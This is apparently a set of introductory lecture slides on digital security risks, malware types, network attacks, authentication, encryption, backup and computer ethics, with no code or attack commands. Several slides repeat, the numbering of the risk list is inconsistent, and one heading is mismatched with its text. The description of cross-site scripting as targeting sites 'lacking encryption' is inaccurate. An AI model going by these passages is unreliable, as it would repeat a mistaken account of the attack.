MALWARE AND COMPUTER SOCIETY

DIGITAL SECURITY RISK

A digital security risk is any event or action that could

cause a loss of or damage to computer hardware, software,
data, information or processing capability.
A digital security risk is any event or action that could
cause a loss of or damage to computer hardware, software,
data, information or processing capability.
Computer crime any illegal act involving the use of a computer
(or similar device)
 DIGITAL SECURITY RISK

Cybercrime
Online or Internet-based illegal acts
Hackers
• Typically, someone who access a computer or network
illegally.
• Has advanced computer and networking skills.
• Some are deliberately paid to test vulnerabilities in systems
and networks as part of cyber security consulting.
 DIGITAL SECURITY RISK

Crackers
• Similar to hackers, someone who access a computer or
network illegally BUT has malicious intent (Destroying data
or Stealing information).
• Has advanced computer and networking skills.
• Same term applied to those who reverse engineer software
to modify it, e.g. to remove license restrictions.
 DIGITAL SECURITY RISK

Script kiddies
• Same malicious intent as crackers -without the skills and
knowledge.
• Use prewritten scripts and programs instead.
• The focus is more on the ends than the means.
• Target vulnerable computers.
 DIGITAL SECURITY RISK

Corporate spies
• Hired to steal sensitive and confidential company data and
information.
• Has advanced computer and networking skills.
 DIGITAL SECURITY RISK

Unethical employees
• These are unauthorized employees who break into the
company's network to access other computers on the
network or the company's server.
• Reason: The challenge; Financial gains; Disgruntled
 DIGITAL SECURITY RISK

Cyberextortionist
• uses the Internet to carry out their schemes
• A perpetrator sends threats to an individual or company to
seek demands (typically monetary in nature)
• Ransom -holding your information "captive" using high-
grade encryption.
 DIGITAL SECURITY RISK

Cyberterrorists
• Uses the Internet or network to destroy or damage
computers
• For: A cause or belief; Political reasons
• Typically highly organized groups with funds and expertise
 DIGITAL SECURITY RISK
15 COMMON CYBERSECURITY RISKS
1. Malware

We’ll start with the most prolific and common form of security threat:
malware. It’s been around since the internet’s inception and continues to remain a
consistent problem. Malware is when an unwanted piece of programming or
software installs itself on a target system, causing unusual behavior. This ranges
from denying access to programs, deleting files, stealing information, and spreading
itself to other systems.
1. Password Theft

“I’ve been hacked!” A common conclusion when you log in to an account,

only to find your password changed and details lost. The reality is an unwanted
third party managed to steal or guess your password and has since run amok with
the information. It’s far worse for an enterprise, which may lose sensitive data.
 DIGITAL SECURITY RISK
15 COMMON CYBERSECURITY RISKS
1. Malware

We’ll start with the most prolific and common form of security threat:
malware. It’s been around since the internet’s inception and continues to remain a
consistent problem. Malware is when an unwanted piece of programming or
software installs itself on a target system, causing unusual behavior. This ranges
from denying access to programs, deleting files, stealing information, and spreading
itself to other systems.
2. Password Theft

“I’ve been hacked!” A common conclusion when you log in to an account,

only to find your password changed and details lost. The reality is an unwanted
third party managed to steal or guess your password and has since run amok with
the information. It’s far worse for an enterprise, which may lose sensitive data.
 DIGITAL SECURITY RISK
15 COMMON CYBERSECURITY RISKS
3. Traffic Interception

Also known as “eavesdropping,” traffic interception occurs when a third-

party “listen” to info sent between a user and host. The kind of information stolen
varies based on traffic but is often used to take log-ins or valuable data.

4. Phishing Attacks
Phishing scams are an older attack method and rely on social engineering
to achieve its goal. Typically, an end user receives a message or email which
requests sensitive data, such as a password. Sometimes, the phishing message
appears official, using legitimate appearing addresses and media. This compels an
individual to click on links and accidentally give away sensitive information.
 DIGITAL SECURITY RISK
15 COMMON CYBERSECURITY RISKS
5. Cross Site Attack

Referred to as an XSS attack. In this instance, a third-party will target a

vulnerable website, typically one lacking encryption. Once targeted the dangerous
code loads onto the site. When a regular user accesses said website, that payload
is delivered either to their system or browser, causing unwanted behavior. The goal
is to either disrupt standard services or steal user information.

6. Zero-Day Exploits
Occurring after the discovery of a “zero-day vulnerability,” an exploit is a
targeted attack against a system, network, or software. This attack takes advantage
of an overlooked security problem, looking to cause unusual behavior, damage
data, and steal information.
 DIGITAL SECURITY RISK
15 COMMON CYBERSECURITY RISKS
7. Zero-Day Exploits

Occurring after the discovery of a “zero-day vulnerability,” an exploit is a

targeted attack against a system, network, or software. This attack takes advantage
of an overlooked security problem, looking to cause unusual behavior, damage
data, and steal information.
8. SQL Injection

An SQL attack is essentially data manipulation, implemented to access

information which isn’t meant to be available. Essentially, malicious third parties
manipulate SQL “queries” (the typical string of code request sent to a service or
server) to retrieve sensitive info.
 DIGITAL SECURITY RISK
15 COMMON CYBERSECURITY RISKS
9. Social Engineering

Similar to phishing, social engineering is the umbrella method for

attempting to deceive users into giving away sensitive details. This can occur
on any platform, and malicious parties will often go to great lengths to
accomplish their goals, such as utilizing social-media info.
10. MitM Attack

A Man-in-the-Middle attack occurs when a third-party hijacks a session

between client and host. The hacker generally cloaks itself with a spoofed IP
address, disconnects the client, and requests information from the client. For
example, attempting to log-in to a bank session would allow a MITM attack to hijack
user info related to their bank account.
 DIGITAL SECURITY RISK
15 COMMON CYBERSECURITY RISKS
11. Ransomware

A nasty variant of malware, ransomware installs itself on a user system or

network. Once installed, it prevents access to functionalities (in part or whole) until
a “ransom” is paid to third parties.

12. Cryptojacking
Cryptojacking is an attempt to install malware which forces the infected
system to perform “crypto-mining,” a popular form of gaining crypto-currency. This,
like other viruses, can infect unprotected systems. It is deployed because the act of
crypto-mining is hardware intensive.
 DIGITAL SECURITY RISK
15 COMMON CYBERSECURITY RISKS
13. Water Hole Attack
Generally used to target organizations, water hole attacks occur when a group
infects websites a particular organization frequently uses. The goal – much like a cross-
site attack – is to load a malicious payload from the infected sites.

14. Drive-By Attack

In a drive-by-attack, malicious code is delivered onto a system or device. The
distinction, however, is that no action is needed on the user end, where typically they
need to click a link or download an executable.

15. Trojan Virus

Trojan malware attempts to deliver its payload by disguising itself as legitimate
software. One technique used was an “alert” a user’s system was compromised by
malware, recommending a scan, whereby the scan actually delivered the malware.
 INTERNET AND NETWORK ATTACK

Information transmitted over networks has a higher degree

of security risk than information kept on an organization’s premises.
In an organization, network administrators usually take measures to
protect a network from security risks. On the Internet, where no
central administrator is present, the security risk is greater.
Internet and network attacks that jeopardize security include
computer viruses, worms, Trojan horses, and rootkits; botnets;
denial of service attacks; back doors; and spoofing. The following
sections address these computer security risks and suggest
measures organizations and individuals can take to protect their
computers while on the Internet or connected to a network.
 INTERNET AND NETWORK ATTACK

Computer Viruses, Worms, Trojan Horses, and Rootkits

Every unprotected computer is susceptible to the first type of
computer security risk — a computer virus, worm, Trojan horse, and/or
rootkit.
• A computer virus is a potentially damaging computer program that
affects, or infects, a computer negatively by altering the way the
computer works without the user’s knowledge or permission. Once the
virus infects the computer, it can spread throughout and may damage
files and system software, including the operating system.
• A worm is a program that copies itself repeatedly, for example in
memory or on a network, using up resources and possibly shutting
down the computer or network.
 INTERNET AND NETWORK ATTACK

Computer Viruses, Worms, Trojan Horses, and Rootkits

• A Trojan horse (named after the Greek myth) is a program that
hides within or looks like a legitimate program. A certain condition
or action usually triggers the Trojan horse. Unlike a virus or
worm, a Trojan horse does not replicate itself to other computers.
• A rootkit is a program that hides in a computer and allows
someone from a remote location to take full control of the
computer. Once the rootkit is installed, the rootkit author can
execute programs, change settings, monitor activity, and access
files on the remote computer.
 INTERNET AND NETWORK ATTACK

Computer Viruses, Worms, Trojan Horses, and Rootkits

Computer viruses, worms, Trojan horses, and rootkits are
classified as malware (short for malicious software), which are
programs that act without a user’s knowledge and deliberately alter
the computer’s operations. Unscrupulous programmers write
malware and then test it to ensure it can deliver its payload. The
payload is the destructive event or prank the program is intended to
deliver. A computer infected by a virus, worm, Trojan horse, or
rootkit often has one or more of the following symptoms:
• Operating system runs much slower than usual
• Available memory is less than expected
 INTERNET AND NETWORK ATTACK

Computer Viruses, Worms, Trojan Horses, and Rootkits

• Files become corrupted • Screen displays unusual message or
image.
• Unknown programs or files mysteriously appear
• Music or unusual sound plays randomly
• Existing programs and files disappear
• Programs or files do not work properly
• System properties change
• Operating system does not start up
• Operating system shuts down unexpectedly
 INTERNET AND NETWORK ATTACK

Currently, more than 300,000 Web sites can infect your

computer with known viruses, worms, Trojan horses, rootkits, and
other malware. These malicious programs deliver their payload on a
computer in a variety of ways: when a user (1) opens an infected
file, (2) runs an infected program, (3) boots the computer with
infected removable media inserted in a drive or plugged in a port,
(4) connects an unprotected computer to a network, or (5) when a
certain condition or event occurs, such as the computer’s clock
changing to a specific date. A common way computers become
infected with viruses and other malware is through users opening
infected e-mail attachments
INTERNET AND NETWORK ATTACK
 INTERNET AND NETWORK ATTACK
SAFEGUARDS AGAINST COMPUTER VIRUSES AND OTHER MALWARE
Users can take several precautions to protect their
home and work computers and mobile devices from these
malicious infections. The following paragraphs discuss these
precautionary measures. Do not start a computer with
removable media, such as optical discs and USB flash drives,
in the drives or ports
 INTERNET AND NETWORK ATTACK
SAFEGUARDS AGAINST COMPUTER VIRUSES AND OTHER MALWARE
Users can take several precautions to protect their home
and work computers and mobile devices from these malicious
infections.
• Do not start a computer with removable media, such as optical
discs and USB flash drives, in the drives or ports
• Never open an e-mail attachment unless you are expecting the
attachment and it is from a trusted source.
• Take special care on social media. Never open files without
checking their source.
• Close websites when the browser tells you they’re not secure.
 INTERNET AND NETWORK ATTACK
SAFEGUARDS AGAINST COMPUTER VIRUSES AND OTHER MALWARE
• Do not accept files from people you don’t know.
• Back up your files regularly.
• stay informed about new virus alerts and virus hoaxes.
• Install antivirus or anti-malware software
• Keep your antivirus software up to date
• Run antivirus scans regularly
• Keep your operating system up to date
• Protect your network
 INTERNET AND NETWORK ATTACK
SAFEGUARDS AGAINST COMPUTER VIRUSES AND OTHER MALWARE
• Think before you click
• Keep your personal information secure
• Don’t use unsecured Wi-Fi
• Back up your files
• Use several secure passwords
 INTERNET AND NETWORK ATTACK

• BOTNET A botnet is a group of compromised computers

connected to a network such as the Internet that are used
as part of a network that attacks other networks, usually for
nefarious purposes. A compromised computer, known as a
zombie, is one whose owner is unaware the computer is
being controlled remotely by an outsider. Cybercriminals
use botnets to send spam via e-mail, spread viruses and
other malware, or commit a denial of service attack.
 INTERNET AND NETWORK ATTACK

• DENIAL OF SERVICE ATTACK A denial of service attack, or DoS

attack, is an assault whose purpose is to disrupt computer access to an
Internet service such as the Web or e-mail. Perpetrators carry out a DoS
attack in a variety of ways. For example, they may use an unsuspecting
computer to send an influx of confusing data messages or useless traffic
to a computer network. The victim computer network slows down
considerably and eventually becomes unresponsive or unavailable,
blocking legitimate visitors from accessing the network. Perpetrators
have a variety of motives for carrying out a DoS attack. Those who
disagree with the beliefs or actions of a particular organization claim
political anger motivates their attacks. Some perpetrators use the attack
as a vehicle for extortion. Others simply want the recognition, even
though it is negative.
 INTERNET AND NETWORK ATTACK

• BACK DOOR A back door is a program or set of instructions in a program

that allow users to bypass security controls when accessing a program,
computer, or network. Once perpetrators gain access to unsecure
computers, they often install a back door or modify an existing program to
include a back door, which allows them to continue to access the computer
remotely without the user’s knowledge.
• SPOOFING Spoofing is a technique intruder use to make their network or
Internet transmission appear legitimate to a victim computer or network. E-
mail spoofing occurs when the sender’s address or other components of
the e-mail header are altered so that it appears the e-mail originated from a
different sender. E-mail spoofing commonly is used for virus hoaxes, spam,
and phishing scams. IP spoofing occurs when an intruder computer fools a
network into believing its IP address is associated with a trusted source.
Perpetrators of IP spoofing trick their victims into interacting with a phony
Web site.
 INTERNET AND NETWORK ATTACK

• SPOOFING Spoofing is a technique intruder use to make

their network or Internet transmission appear legitimate to a
victim computer or network. E-mail spoofing occurs when
the sender’s address or other components of the e-mail
header are altered so that it appears the e-mail originated
from a different sender. E-mail spoofing commonly is used
for virus hoaxes, spam, and phishing scams. IP spoofing
occurs when an intruder computer fools a network into
believing its IP address is associated with a trusted source.
Perpetrators of IP spoofing trick their victims into interacting
with a phony Web site.
 INTERNET AND NETWORK ATTACK

Safeguards against Botnets, DoS Attacks, Back

Doors, and Spoofing To defend against botnets, DoS
attacks, improper use of back doors, and spoofing,
users can implement firewall solutions and install
intrusion detection software. The following sections
discuss these safeguards.
 INTERNET AND NETWORK ATTACK

FIREWALLS A firewall is hardware and/or

software that protects a network’s resources from
intrusion by users on another network such as the
Internet. All networked and online computer users
should implement a firewall solution.
 UNAUTHORIZED ACCESS AND USE

Another type of computer security risk is

unauthorized access and use. Unauthorized access is the
use of a computer or network without permission.
Unauthorized use is the use of a computer or its data for
unapproved or possibly illegal activities. Unauthorized
use includes a variety of activities: an employee using an
organization’s computer to send personal e-mail
messages, an employee using the organization’s word
processing software to track his or her child’s soccer
league scores, or someone gaining access to a bank
computer and performing an unauthorized transfer.
 UNAUTHORIZED ACCESS AND USE
SAFEGUARDS AGAINST UNAUTHORIZED ACCESS AND USE
Organizations take several measures to help prevent
unauthorized access and use. At a minimum, they should have
a written acceptable use policy (AUP) that outlines the
computer activities for which the computer and network may
and may not be used. An organization’s AUP should specify
the acceptable use of computers by employees for personal
reasons. Some organizations prohibit such use entirely.
Others allow personal use on the employee’s own time
such as a lunch hour. Other measures that safeguard against
unauthorized access and use include firewalls and intrusion
detection software, which were discussed in the previous
section, and identifying and authenticating users.
 UNAUTHORIZED ACCESS AND USE
IDENTIFYING AND AUTHENTICATING USERS
Many organizations use access controls to minimize the chance
that a perpetrator intentionally may access or an employee accidentally
may access confidential information on a computer. An access control is a
security measure that defines who can access a computer, when they can
access it, and what actions they can take while accessing the computer. In
addition, the computer should maintain an audit trail that records in a file
both successful and unsuccessful access attempts. An unsuccessful
access attempt could result from a user mistyping his or her password, or it
could result from a hacker trying thousands of passwords. Organizations
should investigate unsuccessful access attempts immediately to ensure
they are not intentional breaches of security. They also should review
successful access for irregularities, such as use of the computer after
normal working hours or from remote computers
 UNAUTHORIZED ACCESS AND USE
IDENTIFYING AND AUTHENTICATING USERS
Many systems implement access controls using a two-
phase process called identification and authentication.
Identification verifies that an individual is a valid user.
Authentication verifies that the individual is the person he or
she claims to be. Three methods of identification and
authentication include user names and passwords, possessed
objects, and biometric devices. The technique(s) an
organization uses should correspond to the degree of risk
associated with the unauthorized access.
 UNAUTHORIZED ACCESS AND USE
USER NAMES AND PASSWORDS
A user name, or user ID (identification), is a unique
combination of characters, such as letters of the alphabet or
numbers, that identifies one specific user. A password is a
private combination of characters associated with the user
name that allows access to certain computer resources.
Most multiuser (networked) operating systems require
that users correctly enter a user name and a password before
they can access the data, information, and programs stored on
a computer or network.
 UNAUTHORIZED ACCESS AND USE
USER NAMES AND PASSWORDS
Multiuser systems typically require that users select their
own passwords. Users typically choose an easy-to-remember word
or series of characters for passwords. If your password is too
obvious, however, such as your initials or birthday, others can guess
it easily. Easy passwords make it simple for hackers and other
intruders to break into a system. Hackers use computer automated
tools to assist them with guessing passwords. Thus, you should
select a password carefully. Longer passwords provide greater
security than shorter ones. Each character added to a password
significantly increases the number of possible combinations and the
length of time it might take for someone or for a hacker’s computer
to guess the password.
 UNAUTHORIZED ACCESS AND USE
USER NAMES AND PASSWORDS
In addition to a user name and password, some systems ask users to
enter one of several pieces of personal information. Such items can include a
spouse’s first name, a birth date, a place of birth, or a mother’s maiden name.
As with a password, if the user’s response does not match the information on
file, the system denies access.
Some Web sites use a CAPTCHA to further protect a user's
password. A CAPTCHA, which stands for Completely Automated Public Turing
test to tell Computers and Humans Apart, is a program that verifies user input
is not computer generated. A CAPTCHA displays a series of distorted
characters and requires the user to enter the characters correctly to continue
using the Web site. For visually impaired users, the CAPTCHA text can be
read aloud. Because unscrupulous individuals attempt to circumvent or decode
CAPTCHAs, developers continually are seeking ways to make them more
secure or develop alternative authentication techniques.
 UNAUTHORIZED ACCESS AND USE
POSSESSED OBJECTS
A possessed object is any item that you must carry to gain
access to a computer or computer facility. Examples of possessed
objects are badges, cards, smart cards, and keys. The card you use
in an automated teller machine (ATM) is a possessed object that
allows access to your bank account.
Possessed objects often are used in combination with
personal identification numbers. A personal identification number
(PIN) is a numeric password, either assigned by a company or
selected by a user. PINs provide an additional level of security. An
ATM card typically requires a four-digit PIN. PINs are passwords.
Select them carefully and protect them as you do any other
password.
 UNAUTHORIZED ACCESS AND USE
BIOMETRIC DEVICES
A biometric device authenticates a person’s identity by translating a
personal characteristic, such as a fingerprint, into a digital code that is
compared with a digital code stored in the computer verifying a physical or
behavioral characteristic. If the digital code in the computer does not match
the personal characteristic code, the computer denies access to the
individual.
Biometric devices grant access to programs, computers, or rooms
using computer analysis of some biometric identifier. Examples of biometric
devices and systems include fingerprint readers, hand geometry systems,
face recognition systems, voice verification systems, signature verification
systems, iris recognition systems, and retinal scanners. Many grocery
stores, retail stores, and gas stations now use biometric payment, where
the customer’s fingerprint is read by a fingerprint reader that is linked to a
specific payment method such as a checking account or credit card.
 SOFTWARE THEFT

Another type of computer security risk is software theft.

Software theft occurs when someone steals software media,
intentionally erases programs, illegally copies a program, or illegally
registers and/or activates a program. One form of software theft
involves someone physically stealing the media that contain the
software or the hardware that contains the media, as described in
the previous section. Another form of software theft occurs when
software is stolen from software manufacturers. This type of theft,
called piracy, is by far the most common form of software theft.
Software piracy is the unauthorized and illegal duplication of
copyrighted software. A related form of software theft involves users
illegally obtaining registration numbers and/or activation codes.
 SOFTWARE THEFT
SAFEGUARDS AGAINST SOFTWARE THEFT
To protect software media from being stolen, owners should
keep original software boxes and media in a secure location. All
computer users should back up their files and disks regularly, in the
event of theft.
To protect themselves from software piracy, software
manufacturers issue users license agreements. A license agreement
is the right to use the software. That is, you do not own the software.
The license agreement provides specific conditions for use of the
software, which a user must accept before using the software.
These terms usually are displayed when you install the software.
 SOFTWARE THEFT
SAFEGUARDS AGAINST SOFTWARE THEFT
The most common type of license included with
software purchased by individual users is a single-user license
agreement, also called an end-user license agreement
(EULA). A single-user license agreement typically includes
many of the following conditions that specify a user’s
responsibility upon acceptance of the agreement.
 SOFTWARE THEFT
USERS ARE PERMITTED TO:
• Install the software on only one computer. (Some license agreements
allow users to install the software on one desktop computer and one
notebook computer.)
• Make one copy of the software as a backup.
• Give or sell the software to another individual, but only if the software is
removed from the user’s computer first. Users are not permitted to:
• Install the software on a network, such as a school computer lab.
• Give copies to friends and colleagues, while continuing to use the
software.
• Export the software.
• Rent or lease the software.
 SOFTWARE THEFT
USERS ARE PERMITTED TO:
Unless otherwise specified by a license agreement, you do not
have the right to copy, loan, borrow, rent, or in any way distribute software.
Doing so is a violation of copyright law. It also is a federal crime. Despite
this, some experts estimate for every authorized copy of software in use, at
least one unauthorized copy exists. In an attempt to prevent software
piracy, Microsoft and other manufacturers have incorporated an activation
process into many of its consumer products. During the product activation,
which is conducted either online or by telephone, users provide the
software product’s 25-character identification number to receive an
installation identification number unique to the computer on which the
software is installed.
If you are not completely familiar with your school or employer’s
policies governing installation of software, check with the information
technology department or your school’s technology
 SOFTWARE THEFT
USERS ARE PERMITTED TO:
Unless otherwise specified by a license agreement, you do not
have the right to copy, loan, borrow, rent, or in any way distribute software.
Doing so is a violation of copyright law. It also is a federal crime. Despite
this, some experts estimate for every authorized copy of software in use, at
least one unauthorized copy exists. In an attempt to prevent software
piracy, Microsoft and other manufacturers have incorporated an activation
process into many of its consumer products. During the product activation,
which is conducted either online or by telephone, users provide the
software product’s 25-character identification number to receive an
installation identification number unique to the computer on which the
software is installed.
If you are not completely familiar with your school or employer’s
policies governing installation of software, check with the information
technology department or your school’s technology
 INFORMATION THEFT

Information theft is yet another type of computer

security risk. Information theft occurs when someone steals
personal or confidential information. An unethical company
executive may steal or buy stolen information to learn about a
competitor. A corrupt individual may steal credit card numbers
to make fraudulent purchases.
 INFORMATION THEFT
HOW DOES INFORMATION THEFT OCCURS?
There is more than one way to steal data. Some popular methods are listed below:
➢ E-Commerce: You should make sure that your data us safe from prying eyes when
you sell or buy things on the Web. Carelessness can lead to leaking your private
account information.
➢ Password cracking: Intruders can access your machine and get valuable data if it is
not password-protected or its password can be easily decoded (weak password).
➢ Eavesdropping: Data sent on insecure lines can be wiretapped and recorded. If no
encryption mechanism is used, there is a good chance of losing your password and
other private information to the eavesdropper.
➢ Laptop theft: Increasingly incidents of laptop theft from corporate firms occur with the
valuable information stored in the laptop being sold to competitors. Carelessness and
lack of laptop data encryption can lead to major losses for the firm.
Information theft could lead to identity theft.
 INFORMATION THEFT
IDENTITY THEFT
It is a crime in which your personal information such as your
name, social security number, date of birth, and address is stolen
and may be used by someone to assume your identity, often for the
purpose of financial gain.
It is also referred to as “identity fraud” when the stolen
identity is used to impersonate the victim. Methods a criminal may
use to steal your data over the Internet include hacking or using
spam and phishing. Social media sites and file sharing can be prime
targets for identity thieves, since users often make the assumption
of a trusted environment, sharing personal information without
understanding the consequences.
 INFORMATION THEFT
SAFEGUARDS AGAINST INFORMATION THEFT
Most companies attempt to prevent information theft by
implementing the user identification and authentication
controls discussed earlier in this chapter. These controls are
best suited for protecting information on computers located on
an organization’s premises. Information transmitted over
networks offers a higher degree of risk because unscrupulous
users can intercept it during transmission. To protect
information on the Internet and networks, companies and
individuals use a variety of encryption techniques.
 INFORMATION THEFT
SAFEGUARDS AGAINST INFORMATION THEFT
Encryption is the process of converting data that is
readable by humans into encoded characters to prevent
unauthorized access. You treat encrypted data just like any
other data. That is, you can store it or send it in an email
message. To read the data, the recipient must decrypt, or
decode it. For example, users may specify that an email
application encrypt a message before sending it securely. The
recipient’s email application would need to decrypt the
message in order for the recipient to be able to read it.
 INFORMATION THEFT
SAFEGUARDS AGAINST INFORMATION THEFT
In the encryption process, the unencrypted, readable
data is called plaintext. The encrypted (scrambled) data is
called ciphertext. An encryption algorithm, or cypher, is a set of
steps that can convert readable plaintext into unreadable
ciphertext. A simple encryption algorithm might switch the
order of characters or replace characters with other
characters. Encryption programs typically use more than one
encryption algorithm, along with an encryption key. An
encryption key is a set of characters that the originator of the
data uses to encrypt the plaintext and the recipient of the data
uses to decrypt the ciphertext.
 INFORMATION THEFT
SAFEGUARDS AGAINST INFORMATION THEFT
2 Basic Types of Encryption
1. Private Key Encryption - private key encryption, also called
symmetric key encryption, both the originator and the recipient use the
same secret key to encrypt and decrypt the data.
2. Public Key Encryption - Public key encryption, also called
asymmetric key encryption, uses two encryption keys: a public key and
a private key. Public key encryption software generates both the private
key and the public key. A message encrypted with a public key can be
decrypted only with the corresponding private key, and vice versa. The
public key is made known to message originators and recipients. For
example, public keys may be posted on a secure webpage or a public-
key server, or they may be emailed. The private key, by contrast,
should be kept confidential.
 INFORMATION THEFT
SAFEGUARDS AGAINST INFORMATION THEFT
Encryption
Some operating systems and email programs allow you to encrypt
the contents of files and messages that are stored on your computer. You
also can purchase an encryption program to encrypt files. Many browsers
use encryption when sending private information, such as credit card
numbers, over the Internet.
Mobile users today often access their company networks through a
virtual private network. When a mobile user connects to a main office using
a standard Internet connection, a virtual private network (VPN) provides the
mobile user with a secure connection to the company network server, as if
the user has a private line. VPNs help ensure that data is safe from being
intercepted by unauthorized people by encrypting data as it transmits from
a laptop, smartphone, or other mobile device.
 INFORMATION THEFT
Digital Signatures and Certificates
A digital signature is an encrypted code that a person, website, or
organization attaches to an electronic message to verify the identity of the
message sender. Digital signatures often are used to ensure that an
impostor is not participating in an Internet transaction. That is, digital
signatures can help to prevent email forgery. A digital signature also can
verify that the content of a message has not changed.
A digital certificate is a notice that guarantees a user or a website
is legitimate. E-commerce applications commonly use digital certificates.
Browsers often display a warning message if a website does not have a
valid digital certificate. A website that uses encryption techniques to secure
its data is known as a secure site (Figure 5-15). Web addresses of secure
sites often begin with https instead of http. Secure sites typically use digital
certificates along with security protocols.
 INFORMATION THEFT
Digital Signatures and Certificates
Who issues digital certificates?
A certificate authority (CA) is an organization that
issues digital certificates. Each CA is a trusted third party that
takes responsibility for verifying the sender’s identity before
issuing a certificate. Individuals and companies can purchase
digital certificates from one of more than 35 online CA
providers. The cost varies depending on the desired level of
data encryption, with the strongest levels recommended for
financial and e-commerce transactions.
 HARDWARE THEFT, VANDALISM AND FAILURE

Users rely on computers and mobile devices to create,

store, and manage important information. You should take
measures to protect computers and devices from theft,
vandalism, and failure.
Hardware theft is the act of stealing digital equipment.
Hardware vandalism involves defacing or destroying
digital equipment. Hardware can fail for a variety of reasons:
aging hardware, natural or man-made disasters, or random
events such as electrical power problems, and even errors in
programs or apps.
 INFORMATION THEFT
System Failure
A digital signature is an encrypted code that a person, website, or
organization attaches to an electronic message to verify the identity of the
message sender. Digital signatures often are used to ensure that an
impostor is not participating in an Internet transaction. That is, digital
signatures can help to prevent email forgery. A digital signature also can
verify that the content of a message has not changed.
A digital certificate is a notice that guarantees a user or a website
is legitimate. E-commerce applications commonly use digital certificates.
Browsers often display a warning message if a website does not have a
valid digital certificate. A website that uses encryption techniques to secure
its data is known as a secure site (Figure 5-15). Web addresses of secure
sites often begin with https instead of http. Secure sites typically use digital
certificates along with security protocols.
 BACKING UP: THE ULTIMATE SAFEGUARD

To protect against data loss caused by hardware/software/information

theft or system failure, users should back up computer and mobile device files
regularly. As previously described, a backup is a duplicate of a file, program, or
media that can be used if the original is lost, damaged, or destroyed; and to
back up a file means to make a copy of it. In the case of system failure or the
discovery of corrupted files, you restore the files by copying the backed-up files
to their original location on the computer or mobile device.
If you choose to back up locally, be sure to use high-quality media. A
good choice for a home user might be optical discs or an external hard drive.
Keep your backup media in a fireproof and heatproof safe or vault, or offsite.
Off-site means in a location separate from where you typically store or use
your computer or mobile device. Keeping backup copies off-site minimizes the
chance that a single disaster, such as a fire, would destroy both the original
and the backup media. An off-site location can be a safe deposit box at a bank,
a briefcase, or cloud storage or cloud backup.
 BACKING UP: THE ULTIMATE SAFEGUARD

Cloud storage provides storage to customers, usually

along with synchronization services but often on smaller
amounts of data. By contrast, cloud backup provides only
backup and retrieval services, but generally provides
continuous data protection (discussed next) to the cloud. More
customers are opting for cloud backup because it saves them
the cost of maintaining hardware.
 BACKING UP: THE ULTIMATE SAFEGUARD

Backup programs are available from many sources. Most operating systems include
a backup program. Backup devices, such as external disk drives, also include backup
programs. Numerous stand-alone backup tools exist. Cloud storage providers may offer
backup services. Users of a cloud backup service install software on their computers that
backs up files to the cloud as they are modified.
Business and home users can perform four types of backup: full, differential,
incremental, or selective. A fifth type, continuous data protection, often is used only by large
enterprises to back up data to an in-house network storage device purchased and maintained
by the enterprise. Cloud backup services, a sixth option, are providing continuous data
protection capabilities at a lower cost. Table 5-2 summarizes the purpose, advantages, and
disadvantages of each of these backup methods. Some users implement a three-generation
backup policy to preserve three copies of important files. The grandparent is the oldest copy
of the file. The parent is the second oldest copy of the file. The child is the most recent copy of
the file. When a new backup is performed, the child becomes the parent, the parent becomes
the grandparent, and the media on which the grandparent copy was stored may be erased
and reused for a future backup.
 ETHICS AND SOCIETY

As with any powerful technology, computers can be used for both

good and bad intentions. The standards that determine whether an action
is good or bad are known as ethics. Computer ethics are the moral
guidelines that govern the use of computers and information systems. Six
frequently discussed areas of computer ethics are unauthorized use of
computers and networks, software theft (piracy), information accuracy,
intellectual property rights, green computing, and information privacy.
Previous sections in this chapter discussed unauthorized use of
computers and networks, and software theft (piracy). The following
sections discuss issues related to information accuracy, intellectual
property rights, green computing, and information privacy. The
questionnaire in Figure 8 raises issues in each of these areas.
 ETHICS AND SOCIETY

INFORMATION ACCURACY
Information accuracy today is a concern because many users
access information maintained by other people or companies, such as on
the Internet. Do not assume that because the information is on the Web
that it is correct. Users should evaluate the value of a Web page before
relying on its content. Be aware that the organization providing access to
the information may not be the creator of the information.
In addition to concerns about the accuracy of computer input, some
individuals and organizations raise questions about the ethics of using
computers to alter output, primarily graphical output such as
retouched photos. Using graphics equipment and software, users easily
can digitize photos and then add, change, or remove images.
 ETHICS AND SOCIETY

INFORMATION ACCURACY
Information accuracy today is a concern because many users access information
maintained by other people or companies, such as on the Internet. Do not assume that
because the information is on the Web that it is correct. Users should evaluate the value of a
Web page before relying on its content. Be aware that the organization providing access to
the information may not be the creator of the information.
In addition to concerns about the accuracy of computer input, some individuals and
organizations raise questions about the ethics of using computers to alter output, primarily
graphical output such as
retouched photos. Using graphics equipment and software, users easily can digitize photos
and then add, change, or remove images.
One group that completely opposes any manipulation of an image is the National
Press Photographers Association. It believes that allowing even the slightest alteration could
lead to misrepresentative photos. Others believe that digital photo retouching is acceptable as
long as the significant content or meaning of the photo does not change. Digital retouching is
an area in which legal precedents so far have not been established.
 ETHICS AND SOCIETY

INTELLECTUAL PROPERTY RIGHTS

Intellectual property (IP) refers to unique and original works such as
ideas, inventions, art, writings, processes, company and product names, and
logos. Intellectual property rights are the rights to which creators are entitled
for their work. Certain issues arise surrounding IP today because many of
these works are available digitally.
A copyright gives authors and artists exclusive rights to duplicate,
publish, and sell their materials. A copyright protects any tangible form of
expression.
A common infringement of copyright is piracy. People pirate (illegally
copy) software, movies, and music. Many areas are not clear-cut with respect
to the law, because copyright law gives the public fair use to copyrighted
material. The issues surround the phrase, fair use, which allows use for
educational and critical purposes.
 ETHICS AND SOCIETY

INTELLECTUAL PROPERTY RIGHTS

This vague definition is subject to widespread interpretation and raises many
questions:
• Should individuals be able to download contents of your Web site, modify it, and then put it
on the Web again as their own?
• Should a faculty member have the right to print material from the Web and distribute it to all
members of the class for teaching purposes only?
• Should someone be able to scan photos or pages from a book, publish them to the Web,
and allow others to download them?
• Should students be able to post term papers they have written on the Web, making it
tempting for other students to download and submit them as their own work?
These issues with copyright law led to the development of digital rights management (DRM),
a strategy designed to prevent illegal distribution of movies, music, and other digital content.
 ETHICS AND SOCIETY

CODES OF CONDUCT
A code of conduct is a written guideline that helps determine whether a
specification is ethical/unethical or allowed/not allowed. An IT code of conduct focuses on
acceptable use of technology. Employers and schools often specify standards for the
ethical use of technology in an IT code of conduct and then distribute these standards to
employees and students (Figure 10). You also may find codes of conduct online that
define acceptable forms of communications for websites where users post commentary
or other communications, such as blogs, wikis, online discussions, and so on.
 ETHICS AND SOCIETY

GREEN COMPUTING
Green computing involves reducing the electricity and environmental waste while
using a computer. People use, and often waste, resources such as electricity and paper
while using a computer. The United States government developed the ENERGY STAR
program to help reduce the amount of electricity used by computers and related devices.
This program encourages manufacturers to create energy-efficient devices that require
little power when they are not in use. Computers and devices that meet the ENERGY
STAR guidelines display an ENERGY STAR label.
